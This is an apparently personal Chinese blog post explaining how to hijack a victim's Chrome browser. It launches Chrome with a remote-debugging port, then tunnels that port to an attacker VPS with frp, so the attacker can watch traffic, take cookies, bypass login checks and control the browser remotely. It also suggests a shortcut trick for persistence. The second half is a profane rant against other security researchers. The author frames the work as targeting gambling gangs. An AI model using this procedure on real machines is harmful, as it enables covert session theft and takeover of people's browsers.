Chrome远程调试劫持

写在前面：

本篇文章的所有实现全是本人独立思考研究出来的（为啥要提可以看小插曲）

为什么有这篇文章，因为项目遇到了一个bc项目拿到了目标工作人员机器的，但是正常的思路取浏览器保存的密码或cookie进后台被一个特殊的验证机制验证了浏览器的localstorange拦住了。这里提一嘴，因为其实bc后台防护等级都比较高，一般不会直接像一些公众号一样拿个棋牌杀猪盘后台直接用密码就进后台。所以说那种直接爆破密码或者钓鱼拿到个人机脱浏览器密码直接进后台的都是蹭bc标题热度的。

至少要解决三个问题：

这三个问题不解决一般是不能进去bc后台的，就算进去了也是对自己不负责（去年圈内的新闻：成都某安全人员协助GA打击黑灰产，被报复砍掉双手）。所以各位所谓打bc的师傅专业点！这里解决方案一般是抓取当前浏览器保存的cookie，然后挂代理用目标的个人机流量去替换cookie进后台，这样就不会有登录记录，就算是有登录ip也是127.0.0.1或者是目标机的出口ip，保证自身安全。

进入正文

Chrome有个DevTools调试在浏览器设置里面，开发大佬应该知道。
这里就不细说了

cmd带参数启动Chrome调试模式并把调试控制台转发到本地某个端口

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=52013

访问127.0.0.1:52013，出现这个界面就说明开启了
先看一下效果

可以看到开一个新的标签也能看到 ps：只能当前在当前浏览器进程

是完全能看到当前网络流量和保存的cookie等信息，类似一个屏幕监控。包括模仿受害人滑动页面也是能同步的。
仅仅如此吗？当然不是

我们尝试点击一下DevTools界面的浏览器画面的一个标签

这里看到在DevTools界面是完全可以接管浏览器的所有动作的！

后续

到这一步了怎么解决远程控制和劫持呢？显然不会直接在目标机器操作吧？
前面讲到了代理，这里也可以。
vps挂上frps当成代理服务器

nohup ./frps -c ./frpc.ini

目标机上传一个frpc开启

frpc.exe -c frpc.ini(图里frp改过的当然不一样)

代理链接成功攻击机上访问127.0.0.1:52013就完成了对Chrome远程劫持和控制了，你可以用来控制对方浏览器看到一切就像在local一样，也可以全局抓包看他的验证机制，从而绕过特殊验证，嫌每次kill麻烦的话可以把参数写到快捷方式路径后面，当然还有一些隐藏的技巧得师傅们去复现测试了
什么勾八垃圾验证机制

小插曲

首先哥们实名diss拿着这种仅对涉网犯罪团伙为目标的项目技术点拿到各个公众号/沙龙（没错就是360的hacking club沙龙）/安全论坛分享！对安全没有半点提升，你是TMD提升犯罪分子的安全水平？前几天在论坛看到一个人的投稿（投稿一般原创或者不一样的思考）帖子不是纯抄吗？隔壁组师傅先搞定的，同部门都不愿意分享，还是在我出结果之后，师傅才拿到周技术分享会议上讲！网上的相关文章基本只有前半部分，因为开发可能需要，跟安全利用相关文章全在这两年的。什么？你说自己研究的？一看其他帖子纯安全菜鸟你给我说你研究的？再说了师傅也不是这方面目标的业务研究你妈呢？别人给你分享的是吧？应该没叫你拿出去在论坛或者公众号之类的地方分享吧？真当黑产不学习呢？隔壁组师傅发论坛（他是名人堂成员），我发blog（是想帮助打击网络犯罪为目标对该技术点有点研究眉目的师傅们能搜到），我和他好歹自己研究的。你呢？国内这些傻逼娱乐圈黑客就抄呗！

结尾吐槽一下某一线攻击队的臭狗，当时找知识点的时候在群里问了一下谁是取证、红队、APT岗位的，有个问题请教一下。某位头部攻击队队员、某安全团队创始人的逼王站出来发了个问号，然后我忍住了直接私聊了问他技术细节然后他说没研究过，一句话带过。后面想集百家之长再次请教：大佬平时在哪学的呢？直接给我来了句：有些东西需要门槛。我也忍了：不学习怎么跨过门槛呢？前段时间在他那个安全团队群里，有个人问了一个mysql身份验证漏洞的问题，看截图都知道是什么漏洞怎么bypass了，逼王出来问了一下CVE编号，搜了几分钟百度之后表示用脚本和msf模块并不能打下来，我说了一句：用命令就直接进了。逼王：你看清楚再发言。这时一个朋友截了个图，逼王又去百度了一番表示：我还以为你说的是登录命令。？？？？？然后我退了群删了好友，搞不懂为啥这些喜欢搞圈子的人总是觉得自己很强。对自己眼里的新手态度极差。常常因为不够娱乐圈，跟各位"大佬"格格不入。可是我比你年轻，部门比你强，你常吹的跟GA合作，在我们这儿那只是最常规的业务呢。从各方面来说你这水平碰瓷你爹干嘛？

乾坤未定，你我皆是牛马。